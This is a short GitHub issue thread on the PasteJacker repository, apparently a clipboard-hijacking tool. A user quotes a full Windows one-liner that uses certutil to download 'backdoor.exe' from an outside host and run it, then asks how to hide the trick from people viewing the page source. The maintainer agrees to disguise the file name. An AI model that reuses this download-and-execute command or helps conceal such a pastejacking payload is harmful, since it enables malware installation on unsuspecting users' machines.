### ISSUE TITLE
Suggestion

### ISSUE THREAD

**Issue by psychomad** [D4Vinci/PasteJacker#2]
Hello 
nice and useful tool. i wonder: if you view the source of the page you can see the trick, maybe there's a way to hide this part?

For example if i paste:

cls & certutil.exe -urlcache -split -f http://eolo.serverbeer.com:8080/backdoor.exe backdoor.exe 2>&1 && backdoor.exe & cls &

Nobody can be tricked because is clear

**Comment by D4Vinci** [comment]
I won't be able to change the whole the liner but I will change the file name.
Thanks, for remembering me I forgot about that!
